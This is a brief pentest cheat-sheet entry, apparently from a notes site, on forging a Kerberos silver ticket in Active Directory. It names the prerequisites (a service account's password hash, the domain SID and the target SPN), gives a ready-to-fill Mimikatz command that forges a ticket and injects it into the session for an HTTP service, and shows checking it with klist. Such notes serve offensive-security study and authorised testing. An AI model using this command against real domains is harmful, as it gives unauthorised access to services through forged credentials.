🥈Silver Ticket

To create a silver ticket, some information are needed:

  • SPN password hash

  • Domain SID

  • Target SPN

Mimikatz

kerberos::golden /sid:$SID$ /domain:$DOMAIN$ /ptt /target:web04.corp.com /service:http /rc4:$HASH$ /user:$USER$

The ticket should be in memory, can be checked with

klist

Last updated